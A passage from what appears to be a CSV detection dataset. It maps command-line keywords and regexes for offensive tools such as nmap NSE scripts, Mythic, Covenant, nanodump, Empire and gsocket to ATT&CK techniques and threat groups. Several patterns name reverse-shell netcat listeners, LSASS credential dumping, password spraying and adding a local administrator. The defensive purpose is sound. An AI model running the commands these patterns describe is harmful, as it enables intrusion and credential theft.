Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2230" "* mysql-users.nse*",".{0,1000}\smysql\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2231" "* mysql-variables.nse*",".{0,1000}\smysql\-variables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2232" "* mysql-vuln-cve2012-2122.nse*",".{0,1000}\smysql\-vuln\-cve2012\-2122\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2233" "* mystikal.py*",".{0,1000}\smystikal\.py.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","0","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","2234" "* mythic start*",".{0,1000}\smythic\sstart.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","2235" "* mythic_container.Mythic*",".{0,1000}\smythic_container\.Mythic.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent 
designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","2236" "* mythic_payloadtype_container*",".{0,1000}\smythic_payloadtype_container.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","0","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","2237" "* mythic-cli*",".{0,1000}\smythic\-cli.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","2238" "* -n *TotallyLegitTool*",".{0,1000}\s\-n\s.{0,1000}TotallyLegitTool.{0,1000}","offensive_tool_keyword","InvisibilityCloak","Proof-of-concept obfuscation toolkit for C# post-exploitation tools","T1027 - T1059.003 - T1140 - T1107","TA0004 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/h4wkst3r/InvisibilityCloak","1","0","N/A","N/A","N/A","6","540","181","2022-07-22T14:13:53Z","2021-05-19T14:19:49Z","2239" "* nachovpn.server*",".{0,1000}\snachovpn\.server.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept 
that demonstrates exploitation of SSL-VPN clients using a rogue VPN server","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","2240" "* nachovpn:latest *",".{0,1000}\snachovpn\:latest\s.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN server","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","2241" "* -Name ""Test.PME"" *",".{0,1000}\s\-Name\s\""Test\.PME\""\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","2242" "* -name .htpasswd*",".{0,1000}\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","linuxprivchecker","search for common privilege escalation vectors such as world writable files. misconfigurations. 
clear-text passwords and applicable exploits","T1210.001 - T1082 - T1088 - T1547.001","TA0002 - TA0004 - TA0006 - TA0007 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py","1","0","#linux","N/A","7","10","1645","524","2022-01-31T10:32:08Z","2016-04-19T13:31:46Z","2243" "* --name covenant *",".{0,1000}\s\-\-name\scovenant\s.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","0","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","2244" "* --name gtunnel-server *",".{0,1000}\s\-\-name\sgtunnel\-server\s.{0,1000}","offensive_tool_keyword","gTunnel","tunneling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","2246" "* -Name Publisher -Value ""Bad Person""*",".{0,1000}\s\-Name\sPublisher\s\-Value\s\""Bad\sPerson\"".{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","2248" "* -Name SQLC2AgentPS *",".{0,1000}\s\-Name\sSQLC2AgentPS\s.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","2249" "* NamelessLog.txt*",".{0,1000}\sNamelessLog\.txt.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","2251" "* namespace SharpPrintNightmare*",".{0,1000}\snamespace\sSharpPrintNightmare.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege 
Escalation","https://github.com/cube0x0/CVE-2021-1675","1","0","#content","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","2252" "* nanodump*",".{0,1000}\snanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","2253" "* nanodump/*",".{0,1000}\snanodump\/.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","2254" "* NativeDump.exe*",".{0,1000}\sNativeDump\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","2255" "* nat-pmp-info.nse*",".{0,1000}\snat\-pmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2256" "* nat-pmp-mapport.nse*",".{0,1000}\snat\-pmp\-mapport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2257" "* nbd-info.nse*",".{0,1000}\snbd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2258" "* -NBNSBruteForce*",".{0,1000}\s\-NBNSBruteForce.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","ALLANITE - ENERGETIC BEAR","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","N/A","10","10","2685","462","2024-08-06T01:47:27Z","2015-04-02T18:04:41Z","2259" "* nbns-interfaces.nse*",".{0,1000}\snbns\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2260" "* nbnsspoof.py*",".{0,1000}\snbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","2261" "* -NBNSTTL *",".{0,1000}\s\-NBNSTTL\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","2262" "* nbstat.nse*",".{0,1000}\snbstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2263" "* nc *.gsocket*",".{0,1000}\snc\s.{0,1000}\.gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","2264" "* nc gsocket 31337*",".{0,1000}\snc\sgsocket\s31337.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other.
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","2265" "* nc -n -v -l -s *",".{0,1000}\snc\s\-n\s\-v\s\-l\s\-s\s.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#linux","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","2266" "* nc_srv.bat*",".{0,1000}\snc_srv\.bat.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","2268" "* ncp-enum-users.nse*",".{0,1000}\sncp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2270" "* ncp-serverinfo.nse*",".{0,1000}\sncp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2271" "* ndmp-fs-info.nse*",".{0,1000}\sndmp\-fs\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2272" "* ndmp-version.nse*",".{0,1000}\sndmp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2273" "* needs High Integrity Privileges to dump the relevant process!*",".{0,1000}\sneeds\sHigh\sIntegrity\sPrivileges\sto\sdump\sthe\srelevant\sprocess!.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists in extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","#content","N/A","10","8","738","88","2025-01-09T14:58:57Z","2023-11-03T18:01:31Z","2274" "* nemesis_connector.py*",".{0,1000}\snemesis_connector\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2275" "* nemesis_db.py*",".{0,1000}\snemesis_db\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2276" "* nemesis_reg_collect_parser.py*",".{0,1000}\snemesis_reg_collect_parser\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource
Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2277" "* nemesis-cli.py*",".{0,1000}\snemesis\-cli\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","2278" "* --neo4j-host *",".{0,1000}\s\-\-neo4j\-host\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","2279" "* --neo4j-host *--neo4j-port*",".{0,1000}\s\-\-neo4j\-host\s.{0,1000}\-\-neo4j\-port.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","0","N/A","N/A","N/A","3","231","19","2024-12-31T08:09:37Z","2020-02-06T17:45:37Z","2280" "* -neo4j-password *",".{0,1000}\s\-neo4j\-password\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","2281" "* --neo4j-port *",".{0,1000}\s\-\-neo4j\-port\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential 
Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","2282" "* --neo4j-user *",".{0,1000}\s\-\-neo4j\-user\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","2283" "* nessus-brute.nse*",".{0,1000}\snessus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2285" "* nessus-xmlrpc-brute.nse*",".{0,1000}\snessus\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2286" "* net localgroup administrators Tater /add*",".{0,1000}\snet\slocalgroup\sadministrators\sTater\s\/add.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","2287" "* 
netbus-auth-bypass.nse*",".{0,1000}\snetbus\-auth\-bypass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","2288" "* netbus-brute.nse*",".{0,1000}\snetbus\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC 